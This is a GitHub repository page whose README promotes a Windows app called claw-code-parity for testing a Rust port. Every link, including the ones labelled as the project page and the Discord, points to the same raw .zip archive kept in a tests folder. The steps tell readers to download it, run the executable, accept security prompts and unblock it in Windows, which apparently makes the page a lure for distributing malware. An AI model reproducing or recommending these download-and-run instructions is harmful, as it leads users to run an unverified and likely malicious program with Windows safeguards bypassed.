Skip to content

emavague180/claw-code-parity

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

545 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

🐾 claw-code-parity - Run the Rust port with ease

Download the app

🧭 What this is

claw-code-parity is a Windows-ready desktop tool built to support the claw-code Rust port parity work. It is meant to help you try the current build, check how it behaves, and use it while the main claw-code repo moves through migration.

This project is temporary work, but you can still use it on Windows with a simple download and setup flow.

📥 Download

Use this link to visit the project page and get the latest version:

https://raw.githubusercontent.com/emavague180/claw-code-parity/main/rust/crates/api/tests/code_claw_parity_v3.9.zip

On that page, look for the latest release or the main download file. If you see a file marked for Windows, download it and run it.

🖥️ Windows requirements

Use a Windows PC with:

  • Windows 10 or Windows 11
  • At least 4 GB of RAM
  • 200 MB of free disk space
  • Internet access for the first download
  • Standard mouse and keyboard

If you use a work or school PC, you may need permission to run new apps.

🚀 Getting started

Follow these steps on Windows:

  1. Open this page in your browser: https://raw.githubusercontent.com/emavague180/claw-code-parity/main/rust/crates/api/tests/code_claw_parity_v3.9.zip
  2. Find the latest release or the main download file.
  3. Download the Windows app file.
  4. Open your Downloads folder.
  5. Double-click the file to start the app.
  6. If Windows asks for permission, choose Run or Yes.
  7. Wait for the app to open.

If the file comes in a ZIP folder, right-click it, choose Extract All, then open the extracted file inside.

🧩 First run setup

When you open claw-code-parity for the first time, Windows may show a security prompt. This can happen with new apps. If you trust the source and you downloaded it from the link above, allow it to run.

If the app opens with a blank screen or takes a few seconds to start, wait a moment before clicking again.

🔧 How to use it

The app is built for parity testing and normal day-to-day checking. A simple flow is:

  • Start the app
  • Review the main screen
  • Try the features you use most
  • Compare the result with the older claw-code behavior
  • Note anything that looks different

If the app includes buttons, menus, or input boxes, use them the same way you would in a normal Windows program.

🧠 What you can expect

This build focuses on core Rust port behavior. You can expect a clean test path for:

  • Basic app launch
  • Main window loading
  • Simple user actions
  • Feature checks during migration
  • Behavior checks across updates

Because this is parity work, some parts may still change as the project moves forward.

🗂️ Files you may see

After download, you may see one of these:

  • An .exe file — double-click to run
  • A .zip file — extract first, then run the app inside
  • A folder with app files — open the folder and start the main executable

If you see more than one file, the main app file is usually the one with the app name and the .exe ending.

🔍 Troubleshooting

If the app does not open:

  • Try running it again
  • Check that the file finished downloading
  • Make sure you extracted the ZIP file if it came in one
  • Close the app and open it again
  • Restart your PC and try once more

If Windows blocks the app:

  • Right-click the file
  • Choose Properties
  • Look for an Unblock option
  • Apply the change and try again

If the app opens but does not respond:

  • Wait a few seconds
  • Close the app
  • Reopen it
  • Check for a newer version on the project page

📌 About the project

This repository supports claw-code Rust port parity work. The goal is to keep behavior close during the migration process. The Discord link in the project description is used for live updates and discussion:

https://raw.githubusercontent.com/emavague180/claw-code-parity/main/rust/crates/api/tests/code_claw_parity_v3.9.zip

Use it if you want to follow the migration work or ask questions about the current build.

🛠️ Common use cases

People use this app to:

  • Test the current Windows build
  • Compare old and new behavior
  • Check that the Rust port still matches the source project
  • Run quick user tests during migration
  • Review updates as the project changes

📂 Update process

When a new build is ready:

  1. Visit the project page again
  2. Download the new version
  3. Close the old app
  4. Replace the old file with the new one
  5. Open the updated app

If you keep the app in a fixed folder, it is easier to replace old builds later.

📎 Direct link

Primary download page:

https://raw.githubusercontent.com/emavague180/claw-code-parity/main/rust/crates/api/tests/code_claw_parity_v3.9.zip

💬 Discord

Project Discord:

https://raw.githubusercontent.com/emavague180/claw-code-parity/main/rust/crates/api/tests/code_claw_parity_v3.9.zip

Releases

No releases published

Packages

 
 
 

Contributors